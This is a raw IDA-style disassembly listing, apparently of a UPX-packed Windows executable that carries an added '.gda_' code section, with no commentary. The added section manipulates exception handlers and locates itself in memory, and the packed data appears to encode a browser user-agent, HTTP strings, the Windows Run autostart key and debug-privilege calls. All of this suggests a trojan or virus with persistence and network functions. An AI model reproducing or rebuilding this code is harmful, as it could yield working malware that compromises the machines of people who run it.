		dd 50DF74C9h, 6E42EA6Bh, 5F57C661h, 6465A540h, 0AFA6B0Ch
		dd 5F7B4499h, 1FD814F8h, 0E8FEB3ABh, 7E689E48h,	624E1520h
		dd 7B385097h, 0CF53E2EBh, 9043455Fh, 3059875Eh,	3CAE7001h
		dd 36D0F433h, 11D6B0EBh, 0D6E6023Eh, 0C1E6C342h, 68B4803Ah
		dd 63A3ABB4h, 0BE608AC0h, 7B7C74E0h, 76336182h,	0E4FBF4A3h
		dd 4552B73Dh, 767BB37Dh, 640D29E0h, 1BE21904h, 23B26863h
		dd 9C170D13h, 0EB13EC13h, 7EC6AC86h, 99AE13EDh,	44F83569h
		dd 0E4093970h, 8F401824h, 4DC3390h, 8C64D24Bh, 0EF609045h
		dd 391C8E06h, 98589472h, 0A0489C50h, 2391C840h,	0A838A447h
		dd 1C28AC30h, 0B0E47239h, 0B81CB420h, 9114BC18h, 0C08E4723h
		dd 0C80CC410h, 0F3E47208h, 0D000CCC8h, 0F8D44DFCh, 8E6DF4D8h
		dd 0F0DC391Ch, 0E8E4ECE0h, 6CD7E068h, 3704C011h, 0DEA36CD3h
		dd 0ADB72F1Bh, 8C02FCB0h, 12730983h, 6EDD8C34h,	85414B80h
		dd 594A8D90h, 0E8EB0CFFh, 9C8709B1h, 5CB40D1Ah,	7E0F991Ah
		dd 748739A1h, 4DD86839h, 989DA8ABh, 4D373D8Ch, 0F6DC806h
		dd 0DD26121h, 4659AC0h,	5BB3B724h, 1521C46Bh, 16A20A34h
		dd 0E41173E3h, 2842276Eh, 0D21E5F9Ah, 0B414AE87h, 1388F818h
		dd 24E3EB9Ch, 99093C28h, 95AF5A15h, 247031B6h, 0A4806355h
		dd 1F0AAD7Fh, 8A51AD01h, 6A9E0B45h, 0EC380C1Eh,	52DB32FFh
		dd 3831CC3Ah, 108FE35Dh, 8825DCDFh, 7D20B5Dh, 35B70FFDh
		dd 80CF5A0Ch, 0F59A93Fh, 3FEF799h, 0C3FE8ED6h, 0FC65B2EDh
		dd 72FFFB80h, 62BA5EBDh, 3B265F76h, 6F045981h, 0A0586833h
		dd 4F43856Dh, 40A8108h,	9DB59B0Ch, 8F0B090Dh, 9B49275h
		dd 0F758076h, 2C255FF9h, 0D9DADE41h, 84323D89h,	0E7D703FFh
		dd 43EB50DBh, 9623FB81h, 5D875F9Fh, 13B166BAh, 5A737B4Fh
		dd 73C196A2h, 2FE665h, 0DBE78B79h, 0FF04FD73h, 7F3CF6FEh
		dd 0C6C5B688h, 0F50F339Fh, 0F33B088Bh, 3B27AADCh, 0A33E1D8Bh
		dd 2F9E57A0h, 2259ED57h, 0F8D69C60h, 56E21359h,	0FFC390E2h
		dd 0EE75B3BBh, 5E1AC8ECh, 271068F2h, 0D3BED3A6h, 1C18099Eh
		dd 2D70843Ch, 2AD650A9h, 454E6105h, 32F8FC2h, 5C6A2BA6h
		dd 9DCDF2AAh, 3A4C5E0Fh, 6E030BFCh, 0B0AB60C0h,	103B4E35h
		dd 0BC025E11h, 42BA275Bh, 80C6096Ch, 0FAE17616h, 6F39DF0Bh
		dd 57935655h, 57B1019h,	13E6D884h, 8F0D0CC3h, 1F0CA551h
		dd 0B120DDFDh, 1462F489h, 0BF66153h, 340B7F02h,	38506ADBh
		dd 52C5D08h, 740096D2h,	0B5E8F1AEh, 1110918h, 3BB00510h
		dd 141960E1h, 6D84F00h,	103B0E17h, 0BDAAA27Eh, 0D5530D74h
		dd 203C51C7h, 11106844h, 18244C39h, 37D0DB0Eh, 0ED85ED3Ah
		dd 4BA5117Eh, 834D2C26h, 14DB0EEDh, 0A20596EFh,	750DF2EBh
		dd 24B7160Eh, 0FADDEB65h, 2C193F68h, 1B33D170h,	46CE0C96h
		dd 0A915182Ch, 0E974106Eh, 1408FA10h, 18D9512Fh, 165B1B56h
		dd 1837FC72h, 3D563EF6h, 0B8C6239h, 412ADC74h, 0C0B6E965h
		dd 2050D361h, 6C5F1810h, 3089381h, 550F5EAAh, 344AEB8Bh
		dd 33E1C68Bh, 32C562Eh,	5359D932h, 27005556h, 108B59CBh
		dd 0C520A25h, 724C5904h, 0AF5D0C20h, 0E418713Ch, 0DE530128h
		dd 7EDE4E21h, 8E6956E2h
		dd 1E3C3494h, 794E365Ch, 0D8875F7h, 1D140487h, 0B2582D28h
		dd 7AA4BBC5h, 0D85A3568h, 3D9A045Eh, 203B10F4h,	813DDF06h
		dd 7D221DCFh, 1E748D47h, 983F7B01h, 56FCCF40h, 0FF1C1E48h
		dd 0DEA5E417h, 4545E0B5h, 521F0FFFh, 36666C38h,	46506008h
		dd 0E6740E1Ch, 89BD766Ah, 36A93CB7h, 0D68681B2h, 4FB0B657h
		dd 8E47069Ch, 84D4391Ch, 70DC78D8h, 0C8E464E0h,	4CE42391h
		dd 24EC40E8h, 72398326h, 4F414F0h, 9C4C84B7h, 0BF0B9A2Fh
		dd 8AF9BE64h, 7E2C742Ch, 0C43D188Bh, 34597B06h,	177572B4h
		dd 0D354490Eh, 91DC113h, 48833E2Ah, 0A3C9A891h,	88E075BDh
		dd 0C1361188h, 9746A78h, 317674B4h, 8859FE8Bh, 0BCDE636Ah
		dd 0F82FA184h, 83227027h, 0C08303E0h, 51705705h, 59CD45E9h
		dd 230DCAFDh, 1210CFD7h, 0BDCCC33Dh, 26D60713h,	9D3F140Eh
		dd 0E887B305h, 40A26150h, 0E84D096Fh, 0C63F4120h, 99598B36h
		dd 41D986D7h, 60D9F424h, 1F4541Bh, 61E812B8h, 8BE007BAh
		dd 22E7D89Fh, 1FC517D0h, 0A600C748h, 5914310Dh,	21BA1025h
		dd 0B3BFBF08h, 501D6AE0h, 71DCBFh, 0A03F514Fh, 7403D583h
		dd 0BB0A3137h, 615FD8A0h, 52D1BEA7h, 8B37F453h,	0BC3D660Dh
		dd 0B1383D53h, 0EE6BDB3Ah, 0CE590FEBh, 368B632h, 1B0C165Bh
		dd 16C965E2h, 0C2268DDCh, 3141CC68h, 683A464Eh,	0B9BB66E7h
		dd 12971A0Dh, 66AF495Eh, 4A4C12C1h, 0DE1219EEh,	0BBC631D8h
		dd 162CFD3Bh, 0B596C823h, 0A3480710h, 0CF216C5h, 0CD6015EBh
		dd 1CA65709h, 5D511910h, 43D5F07Dh, 5044330Ch, 856A7D68h
		dd 138B67BEh, 0CC4011h,	0F23306FFh, 5284CDCh, 0F0F410F8h
		dd 3DF52351h, 9B51001Bh, 0FBF63F8Dh, 14723BBEh,	2D0BE981h
		dd 17018504h, 0C82BEC73h, 0D5A0568Bh, 8B0CC4B7h, 0EA088BE1h
		dd 0C6C653A3h, 6443B646h, 4958055Ch, 0A8A04500h, 51E600C0h
		dd 6F18054h, 0E296EF02h, 53522497h, 8F803141h, 8DF50101h
		dd 0FFFF1183h, 5279FFFFh, 3AE42AECh, 9B49E7F6h,	0AFBEE0EAh
		dd 447EDB21h, 615E1A95h, 1F85A032h, 0FF949F6Ah,	43FF3994h
		dd 0A684FFFFh, 0CE358F26h, 0C9A55C1Dh, 657AB20Bh, 4D373072h
		dd 6C697A6Fh, 0FF6B616Ch, 342FFFFFh, 2820302Eh,	706D6F63h
		dd 62697461h, 203B656Ch, 4549534Dh, 9153620h, 7FFFBA81h
		dd 646E6957h, 2073776Fh, 3520544Eh, 3429312Eh, 0BE798EE4h
		dd 0D4007767h, 0B4C40104h, 0E790A00Eh, 80E7BEFBh, 0E680474h
		dd 9B480958h, 3C9E79ECh, 4530D474h, 0E7C82220h,	4A1026F9h
		dd 40F80030h, 6FFDB6B7h, 76766313h, 7E75722Eh, 65070077h
		dd 0C6DFEF64h, 65976CB6h, 65C1660Fh, 72616573h,	370E6863h
		dd 1F6FFE57h, 6F626F72h, 61686378h, 1FD2676Eh, 7C8D7465h
		dd 720C6FFBh, 69622E64h, 2861007Ah, 616B6863h, 0BB17376Dh
		dd 6740CB0h, 24782Dh, 0B76F6C06h, 0E6DB66Dh, 476B3762h
		dd 7A027626h, 0DFB1852Eh, 1B7674DEh, 706F7411h,	69176E2Eh
		dd 10ADB00Fh, 332773B0h, 6F0F788Dh, 611FE176h, 746C7564h
		dd 694B652Dh, 0E1338072h, 6FDB6EDBh, 4E73A66Eh,	67622E74h
		dd 6B67694Fh, 32580FBFh, 61777800h, 62626A2Ch, 0F676DFADh
		dd 7A9B006Fh, 0A8616661h, 23655D2Eh, 10FFFE5Ch,	6261AF09h
		dd 66656463h, 6A696867h, 6E6D6C6Bh, 0DDBF0A1Bh,	0F77271C5h
		dd 78777675h, 43650E79h, 0F8DFED44h, 474645FFh,	4B4A4948h
		dd 4F4E4D4Ch, 54545150h, 58575655h, 71B5A59h, 23187FF6h
		dd 70747468h, 252F2F3Ah, 0DF2F0B73h, 65737E16h,	68702E97h
		dd 3D0E3F70h, 6373260Fh, 0CF6FED6Eh, 2664066Fh,	76666E69h
		dd 39313D3Bh, 1526322Dh, 0B948EC1Eh, 0EBA21D74h, 32313D58h
		dd 7F7D9137h, 3101A8D7h, 3030383Ah, 0DFDF652Fh,	1FFFFB00h
		dd 5DDFE8B0h, 0B966C933h, 758D01EEh, 8AFE8B05h,	7993C06h
		dd 6DFFFD06h, 302C0646h, 88993446h, 0EDE24707h,	0DAE80AEBh
		dd 0FEFFDB7Eh, 6765DF85h, 9993712Eh, 0FD1201C9h, 16FD91BDh
		dd 0FEEBC107h, 6872FFFDh, 66FD42AAh, 0BA10FDAAh, 98A91C14h
		dd 98F3C91Ah, 28608F1h,	763FF67Fh, 9010C071h, 9237CB5Fh
		dd 781C9659h, 57E4143Ah, 7DB77D71h, 3A0A61F2h, 9DF34571h
		dd 98904F1h, 0DF73A47Fh, 119C04F1h, 0F367B340h,	1C10F0E3h
		dd 0B1DDBDFEh, 59B20BDCh, 25C99B60h, 414D901h, 0B1F2C8A1h
		dd 71CA17C7h, 688D2B9Eh, 0ADAD9161h, 1AC2F67Dh,	111D96E2h
		dd 0C850B228h, 0FDBB9900h, 0DC14EDB3h, 12255557h, 91C0A44Eh
		dd 0ED994912h, 9FBB54F7h, 1400DBFDh, 0CBCA3AC4h, 0FF1C3B71h
		dd 1A21E424h, 6D93CDCFh, 8FCDB0F6h, 3F812C66h, 76CDF31Eh
		dd 0B8B0FBFFh, 12CDC383h, 0CBC9A85Dh, 99AD251Dh, 24B64FECh
		dd 0A6485A0Bh, 1B14C096h, 3FD9767Eh, 0EBA7294Ch, 0E9BA9CF3h
		dd 26F43416h, 3FFEEE71h, 0EFCF5FBh, 0EF133BF9h,	376B4629h
		dd 4766DE5Fh, 0ECA0A8ECh, 16CDFFFDh, 0FFC5B701h, 0E9ECE9EDh
		dd 0E1FCB7FDh, 7FB7012Ch, 0F5CA21F7h, 0F25AFCFCh, 0FCF7EBFCh
		dd 0D6ABAAF5h, 0BFEC34C7h, 0AAF9FFFCh, 2A25B459h, 0ACC9662Ah
		dd 0B7819093h, 83639D90h, 9271CDC9h, 17DD8430h,	3519BFFEh
		dd 95D91451h, 2A91720Ah, 68EBC871h, 0D21FFFFFh,	80D512A5h
		dd 0AA529AE1h, 2A8D146Fh, 12B9C89Ah, 474A9A8Bh,	0DFDBFFFFh
		dd 9BAB9EC3h, 20A319DBh, 0DDA26CECh, 9EED85BDh,	81E8A2DFh
		dd 125544EBh, 0FFF9A1C8h, 961FBDB7h, 12EB8D2Eh,	5A9A85D8h
		dd 9A099D12h, 96F8105Ah, 613FF76Dh, 664922D0h, 12FEFD7Fh
		dd 0C25AA987h, 680C0295h, 1285EDDBh, 5A910482h,	7FCFF7CBh
		dd 0FF372139h, 4D53FF85h, 53187242h, 0FCFEFFC8h, 62FE97FFh
		dd 43500200h, 57544583h, 204B524Fh, 474F5250h, 204D4152h
		dd 7DAC5231h, 4C17CD6Bh, 24D4E41h, 56EBAB0Ah, 15661D6Ah
		dd 676B03B7h, 0D2DD6EBBh, 0E707576h, 27611A33h,	5832234Dh
		dd 96C3E54Ch, 32323221h, 79D6312Eh, 18DA6B06h, 8B323C20h
		dd 50BB73A4h, 2207192Bh, 5123FF0Ch, 7D8363h, 140A1104h
		dd 0FD40520h, 0A0BB5BD1h, 4B4C0069h, 0B7505353h, 923DBF97h
		dd 0E00882E0h, 2400574Ah, 64006Eh, 0EE6D8B6Fh, 73007502h
		dd 130743Ah, 0D912DB09h, 398CDBh, 2E1D2335h, 0D913907h
		dd 0ABDA0098h, 49922008h, 57DAE406h, 6760D89Fh,	0F2000370h
		dd 7472346h, 3203C8DCh,	6000640h, 237F0110h, 151FFFFAh
		dd 48E0888Ah, 44004F00h, 7A6A19FEh, 6F49E4F2h, 1CFFB022h
		dd 2530AF28h, 53671074h, 0D7DF5CE1h, 7590A796h,	5C040030h
		dd 0BAEEBD07h, 85A35D7h, 2E4D615Ch, 38003607h, 46C6EDB1h
		dd 1B30772Eh, 43EC0049h, 336761CFh, 633F00E8h, 2DBFA264h
		dd 0DC08201Fh, 0FF164004h, 0DEDE00h, 0E41EC242h, 9F16000Eh
		dd 40260201h, 6137EFB8h, 11031928h, 97D96C8Bh, 7468D835h
		dd 2A9B70D3h, 852DB69Ch, 9F256B7Ch, 0EB480E10h,	47B03BAh
		dd 5413541Bh, 3F63265Ah, 59ADB9F7h, 0CBC75C22h,	5876545h
		dd 907BD800h, 10030BE6h, 0B810B848h, 0FD8F0B0Eh, 6A05BFFFh
		dd 0C391928h, 9B11D0B1h, 4FC000A8h, 5FF52ED9h, 0F68A885Dh
		dd 0EBFC2FB2h, 9F11C91Ch, 102B3CE8h, 0CD16048h,	92BCA3F4h
		dd 0A06045CFh, 470CA00Ch, 0B1879006h, 0CA0000Ch, 277FDF24h
		dd 9004088h, 703EC00h, 8F60D900h, 401495F0h, 40707C4Fh
		dd 1F0700BFh, 4314BD91h, 13857813h, 0F84F3C81h,	0A65BAB00h
		dd 0F81013E9h, 0E31A8B2Fh
		dd 0EFEFF39h, 4FBE4023h, 806183Ah, 0B9438884h, 7C9E4F10h
		dd 1FFEEBAh, 200C10B8h,	3E420DADh, 7F0726CCh, 0E4AFD80Fh
		dd 118BCB3h, 840F8470h,	0F200DF0Fh, 0F9521h, 0F0847F02h
		dd 0F93C9B0h, 9A000F6Ch, 5BD911A8h, 13436F95h, 8127F958h
		dd 586E691Fh, 72502050h, 0DB679000h, 1444614h, 906B3239h
		dd 3C89F927h, 2751512h,	43005341h, 1C81AF64h, 7FEB0194h
		dd 695FFF3h, 255C5CC6h,	70695C73h, 81662463h, 0FF071CECh
		dd 2EA6A3E4h, 655300FFh, 75626544h, 85766967h, 0FD93A767h
		dd 64411F46h, 5461756Ah, 6E656B6Fh, 93FB7317h, 6F4C36DCh
		dd 56707512h, 65756C61h, 0B1A91741h, 704FB7EDh,	24636F28h
		dd 43003473h, 1D4B062Ah, 333F6176h, 6CE0AFE3h, 6D4C7954h
		dd 7F12BAF9h, 5F1565A3h, 79617254h, 430F3957h, 0A5B6A5B7h
		dd 521E6135h, 54056F6Ch, 0AA546B68h, 56140C73h,	6D5CDF77h
		dd 416D6EA6h, 78455328h, 8D6E3E7Bh, 35ACF4BEh, 22F3F54Bh
		dd 50545448h, 0E25FBD83h, 32204012h, 4B4F205Bh,	6D010A0Dh
		dd 4BEA56B7h, 2D0244A3h, 4B67044Ch, 315BECD9h, 7525203Ah
		dd 56282F18h, 540F6B5Bh, 0A726B979h, 0AB518A70h, 8763D4CDh
		dd 0D6062F15h, 0CBD53DCAh, 0CD72972Dh, 546B57A3h, 4473168h
		dd 0FFFAF82Fh, 6468F74Ah, 8D73CFE9h, 6376736Dh,	68596A71h
		dd 6977CFA9h, 0FBEC5DF5h, 5F32076Eh, 78EB7517h,	36380307h
		dd 3734D34Dh, 33343536h, 3A69A569h, 307CBF7h, 20303132h
		dd 39BB3B9Fh, 3D003833h, 0C833707h, 3536C832h, 320E3334h
		dd 313220C8h, 0A56B7830h, 3AF7A426h, 0D8BBD9D0h, 533FFE5Eh
		dd 5754464Fh, 5C455241h, 736F694Dh, 0D85CD76Fh,	0C3B07E1Ah
		dd 7275435Ch, 0DC561572h, 885C573h, 525C0A6Fh, 239F6E75h
		dd 0DA146F74h, 24D6A16Dh, 53203068h, 0ED87FB1Bh, 3FE728FFh
		dd 64736E67h, 2B796A72h, 1980265h, 530064DCh, 155F0A51h
		dd 0E4B619Ah, 664B4D6Ch, 0CD899087h, 0C549235Fh, 2F05538h
		dd 0FF540A18h, 43205317h, 0DDA3EE5h, 76206762h,	58763FD5h
		dd 6DECD96Ch, 23B53284h, 165B1B7Ch, 471A17B2h, 1F8D1723h
		dd 931299BFh, 707379h, 0D62D6342h, 0C3208D1Ah, 1B132361h
		dd 0ED6D80C0h, 9752206Dh, 443772DDh, 2D2DBB9Eh,	661220E4h
		dd 0AC6D672Fh, 6C2FF62Ah, 632463C9h, 79746922h,	6E614D20h
		dd 16C8051Eh, 31BC1AB9h, 146B0A8Ah, 0A24E2370h,	1BBC4ABh
		dd 6488F6E8h, 6572463Fh, 0DF50C65h, 0FC01B8A5h,	4D746547h
		dd 4665876Fh, 97F0066Bh, 6D614EE2h, 736C0168h, 95637274h
		dd 0BBDEE05Bh, 706F430Ah, 9D0A1979h, 291F1445h,	326578DCh
		dd 6F6F544Ah, 0FDA2936Ch, 337063BFh, 616E5332h,	6F687370h
		dd 2B9C1974h, 126B7745h, 0F737232h, 3E358F54h, 2C5CC160h
		dd 654E2118h, 87887478h, 6169C16Dh, 76455441h, 57FF6DBDh
		dd 69616B0Bh, 726F4674h, 7B673C53h, 0B06A624Fh,	76AE8856h
		dd 22DD442Ch, 6E6FEF8Dh, 0B6972F6h, 6573C83Ah, 646E6148h
		dd 25EDB00Ch, 5E24477Bh, 6DD26E08h, 61EF7084h, 4493F05Ah
		dd 6CEDB7A3h, 79645673h, 61984C14h, 866E492Bh, 66DD6ED8h
		dd 9530F6Fh, 49067065h,	0E02CD998h, 656B260Dh, 0B3284564h
		dd 36623364h, 0E0CC366Eh, 0B9FEC447h, 64410B12h, 70F7264h
		dd 7DECD836h, 7262694Ch, 2BB56761h, 0B2C2824Dh,	137CB9A2h
		dd 9ED08ED5h, 63CF02CDh, 0B6816954h, 88B6B0E2h,	4DDE6575h
		dd 66CD78E9h, 0CE341245h, 0F684590Dh, 39C45D86h, 0ACD8624Fh
		dd 455A843Ch, 0B8DF3178h, 0A4B6DB1h, 2D6D1363h,	85D91B52h
		dd 7B5926E7h, 657A8608h, 38216D38h, 154CA7B0h, 0CDDFC45h
		dd 60C368D8h, 673A2BD1h, 67E77390h, 79654BA1h, 0B0861045h
		dd 0C13B0ED6h, 0F60A510Fh, 0B0109B11h, 0E7309E97h, 61DEDD21h
		dd 51E01016h, 2962410Ch, 6EA1070Ah, 46853BEh, 8AF6612Dh
		dd 773B8643h, 0B05F6D36h, 0A108946h, 8E611244h,	0E98AEEDh
		dd 7966696Eh, 0DB8F67CAh, 75B586D0h, 0CE6C362Bh, 0DC2C796Fh
		dd 11D85BD9h, 8F52106Fh, 8D40E3Dh, 1DB4CC0Eh, 148FE436h
		dd 75716341h, 494D7269h, 2B9C1669h, 133AA035h, 0B473ECDEh
		dd 7273F0CDh, 0B26D06CAh, 5AE60E35h, 0F92862Ch,	1D1D4D53h
		dd 5F76856Eh, 5F3F5844h, 7311F668h, 27F502B1h, 982B0702h
		dd 7279B6CDh, 110E94Fh,	334D2291h, 1D294562h, 0D8B6527h
		dd 150E0073h, 41BB0A14h, 0B4E73098h, 73776649h,	856ED9A7h
		dd 66B10570h, 24F44F41h, 18A0D0F6h, 55855604h, 5B01489Bh
		dd 0E1141D8h, 0DC1A967h, 36B144Bh, 9963496Eh, 534386E1h
		dd 471A8174h, 2543AA3Bh, 73FFA10Dh, 6CB2CB2Ch, 10D0202h
		dd 2CB26F39h, 1734B2CBh, 9304090Ch, 13CB2CAAh, 0F9361610h
		dd 50D16AADh, 0DC960E45h, 40DD34h, 3FED9A00h, 10F00E0h
		dd 0C06010Bh, 83B11226h, 34DC472Ch, 31421023h, 0C966E90Bh
		dd 74A02A8h, 0EC0D600Ch, 341E2DCCh, 58840710h, 570692CEh
		dd 2B098C2Dh, 6420176Ch, 831E017Ch, 2E8C516Dh, 9024A26Ah
		dd 60241F26h, 49FC460h,	0F6642EE0h, 0E11ED90Dh,	2A0714FBh
		dd 0E850D227h, 48C01616h, 2F81h, 54C3F800h, 24000000h
		dd 0FF0000h, 2 dup(0)
; ---------------------------------------------------------------------------
		pusha
		mov	esi, offset dword_31426000
		lea	edi, [esi-5000h]
		push	edi
		or	ebp, 0FFFFFFFFh
		jmp	short loc_31427BD2
; ---------------------------------------------------------------------------
		align 8


loc_31427BC8:				; CODE XREF: UPX1:loc_31427BD9j
		mov	al, [esi]
		inc	esi
		mov	[edi], al
		inc	edi


loc_31427BCE:				; CODE XREF: UPX1:31427C66j
					; UPX1:31427C7Dj
		add	ebx, ebx
		jnz	short loc_31427BD9


loc_31427BD2:				; CODE XREF: UPX1:31427BC0j
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427BD9:				; CODE XREF: UPX1:31427BD0j
		jb	short loc_31427BC8
		mov	eax, 1


loc_31427BE0:				; CODE XREF: UPX1:31427BEFj
					; UPX1:31427BFAj
		add	ebx, ebx
		jnz	short loc_31427BEB
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427BEB:				; CODE XREF: UPX1:31427BE2j
		adc	eax, eax
		add	ebx, ebx
		jnb	short loc_31427BE0
		jnz	short loc_31427BFC
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx
		jnb	short loc_31427BE0


loc_31427BFC:				; CODE XREF: UPX1:31427BF1j
		xor	ecx, ecx
		sub	eax, 3
		jb	short loc_31427C10
		shl	eax, 8
		mov	al, [esi]
		inc	esi
		xor	eax, 0FFFFFFFFh
		jz	short loc_31427C82
		mov	ebp, eax


loc_31427C10:				; CODE XREF: UPX1:31427C01j
		add	ebx, ebx
		jnz	short loc_31427C1B
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427C1B:				; CODE XREF: UPX1:31427C12j
		adc	ecx, ecx
		add	ebx, ebx
		jnz	short loc_31427C28
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427C28:				; CODE XREF: UPX1:31427C1Fj
		adc	ecx, ecx
		jnz	short loc_31427C4C
		inc	ecx


loc_31427C2D:				; CODE XREF: UPX1:31427C3Cj
					; UPX1:31427C47j
		add	ebx, ebx
		jnz	short loc_31427C38
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427C38:				; CODE XREF: UPX1:31427C2Fj
		adc	ecx, ecx
		add	ebx, ebx
		jnb	short loc_31427C2D
		jnz	short loc_31427C49
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx
		jnb	short loc_31427C2D


loc_31427C49:				; CODE XREF: UPX1:31427C3Ej
		add	ecx, 2


loc_31427C4C:				; CODE XREF: UPX1:31427C2Aj
		cmp	ebp, 0FFFFF300h
		adc	ecx, 1
		lea	edx, [edi+ebp]
		cmp	ebp, 0FFFFFFFCh
		jbe	short loc_31427C6C


loc_31427C5D:				; CODE XREF: UPX1:31427C64j
		mov	al, [edx]
		inc	edx
		mov	[edi], al
		inc	edi
		dec	ecx
		jnz	short loc_31427C5D
		jmp	loc_31427BCE
; ---------------------------------------------------------------------------
		align 4


loc_31427C6C:				; CODE XREF: UPX1:31427C5Bj
					; UPX1:31427C79j
		mov	eax, [edx]
		add	edx, 4
		mov	[edi], eax
		add	edi, 4
		sub	ecx, 4
		ja	short loc_31427C6C
		add	edi, ecx
		jmp	loc_31427BCE
; ---------------------------------------------------------------------------


loc_31427C82:				; CODE XREF: UPX1:31427C0Cj
		pop	esi
		mov	edi, esi
		mov	ecx, 7Eh


loc_31427C8A:				; CODE XREF: UPX1:31427C91j
					; UPX1:31427C96j
		mov	al, [edi]
		inc	edi
		sub	al, 0E8h


loc_31427C8F:				; CODE XREF: UPX1:31427CB4j
		cmp	al, 1
		ja	short loc_31427C8A
		cmp	byte ptr [edi],	1
		jnz	short loc_31427C8A
		mov	eax, [edi]
		mov	bl, [edi+4]
		shr	ax, 8
		rol	eax, 10h
		xchg	al, ah
		sub	eax, edi
		sub	bl, 0E8h
		add	eax, esi
		mov	[edi], eax
		add	edi, 5
		mov	eax, ebx
		loop	loc_31427C8F
		lea	edi, [esi+5000h]


loc_31427CBC:				; CODE XREF: UPX1:31427CDEj
		mov	eax, [edi]
		or	eax, eax
		jz	short loc_31427D07
		mov	ebx, [edi+4]
		lea	eax, [eax+esi+7000h]
		add	ebx, esi
		push	eax
		add	edi, 8
		call	dword ptr [esi+708Ch]
		xchg	eax, ebp


loc_31427CD9:				; CODE XREF: UPX1:31427CFFj
		mov	al, [edi]
		inc	edi
		or	al, al
		jz	short loc_31427CBC
		mov	ecx, edi
		jns	short near ptr loc_31427CEA+1
		movzx	eax, word ptr [edi]
		inc	edi
		push	eax
		inc	edi


loc_31427CEA:				; CODE XREF: UPX1:31427CE2j
		mov	ecx, 0AEF24857h
		push	ebp
		call	dword ptr [esi+7090h]
		or	eax, eax
		jz	short loc_31427D01
		mov	[ebx], eax
		add	ebx, 4
		jmp	short loc_31427CD9
; ---------------------------------------------------------------------------


loc_31427D01:				; CODE XREF: UPX1:31427CF8j
		call	dword ptr [esi+7094h]


loc_31427D07:				; CODE XREF: UPX1:31427CC0j
		popa
		jmp	loc_31422334
; ---------------------------------------------------------------------------
		align 400h
UPX1		ends

; Section 3. (virtual address 00008000)
; Virtual size			: 00002000 (   8192.)
; Section size in file		: 00002000 (   8192.)
; Offset to raw	data for section: 00008000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
UPX2		segment	para public 'CODE' use32
		assume cs:UPX2
		;org 31428000h
		assume es:nothing, ss:nothing, ds:UPX0,	fs:nothing, gs:nothing
		dd 3 dup(0)
		dd 80C4h, 808Ch, 3 dup(0)
		dd 80D1h, 809Ch, 3 dup(0)
		dd 80DEh, 80A4h, 3 dup(0)
		dd 80E9h, 80ACh, 3 dup(0)
		dd 80F4h, 80B4h, 3 dup(0)
		dd 8100h, 80BCh, 5 dup(0)
dword_3142808C	dd 77E805D8h		; DATA XREF: .gda_:3142A039r
					; .gda_:3142A062r ...
		dd 77E7A5FDh, 77E75CB5h, 0
		dd 77DD189Ah, 0
		dd 77C3528Dh, 0
		dd 77D4C96Ah, 0
		dd 7620AFB6h, 0
		dd 71AB1A6Dh, 0
		dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
		dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
		dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
		dd 642E3233h, 6C6Ch, 64616F4Ch,	7262694Ch, 41797261h, 65470000h
		dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
		dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
		dd 646Eh, 72707377h, 66746E69h,	41h, 65746E49h,	74656E72h
		dd 6E65704Fh, 41h, 26h dup(0)
		dd 0C3906893h, 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h
		dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 427500F8h
		dd 0E8h, 0ED815D00h, 402338h, 2385858Bh, 85030040h, 40238Dh
		dd 858BF08Bh, 402389h, 238D8503h, 60500040h, 0C933FE8Bh
		dd 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h,	7C004023h
		dd 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h,	60000387h
		dd 7BB00000h, 0
		dd 1E003142h, 480000h, 75Ch dup(0)
UPX2		ends

; Section 4. (virtual address 0000A000)
; Virtual size			: 00020001 ( 131073.)
; Section size in file		: 00020001 ( 131073.)
; Offset to raw	data for section: 0000A000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_gda_		segment	para public 'CODE' use32
		assume cs:_gda_
		;org 3142A000h
		assume es:nothing, ss:nothing, ds:UPX0,	fs:nothing, gs:nothing
		db 0
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		call	loc_3142A013
		call	sub_3142A0B5
		jmp	near ptr byte_3142A068
; ---------------------------------------------------------------------------


loc_3142A013:				; CODE XREF: .gda_:3142A004p
		push	dword ptr fs:0
		mov	ds:dword_3142A069, ebp
		mov	fs:0, esp
		xor	eax, eax
		push	80000000h
		push	eax
		push	eax
		push	eax
		push	8000h
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	ds:dword_3142808C	; LoadLibraryA
		xor	ecx, ecx
		push	ecx
		push	ecx
		push	ecx
		push	ecx
		push	2
		push	80000000h
		push	200h
		push	ecx
		push	ecx
		push	10h
		push	80000000h
		push	ecx
		push	ecx
		call	ds:dword_3142808C	; LoadLibraryA
; ---------------------------------------------------------------------------
byte_3142A068	db 0BDh			; CODE XREF: .gda_:3142A00Ej
dword_3142A069	dd 12FFC0h		; DATA XREF: .gda_:3142A019w
; ---------------------------------------------------------------------------
		sub	eax, eax


loc_3142A06F:				; CODE XREF: .gda_:3142A075j
		dec	al
		or	al, al
		jz	short loc_3142A079
		jnz	short loc_3142A06F
		jmp	short loc_3142A0E0
; ---------------------------------------------------------------------------


loc_3142A079:				; CODE XREF: .gda_:3142A073j
		call	$+5
		pop	edi
		add	edi, 44h
		sub	edx, edx
		xor	edx, 2898h
		cld
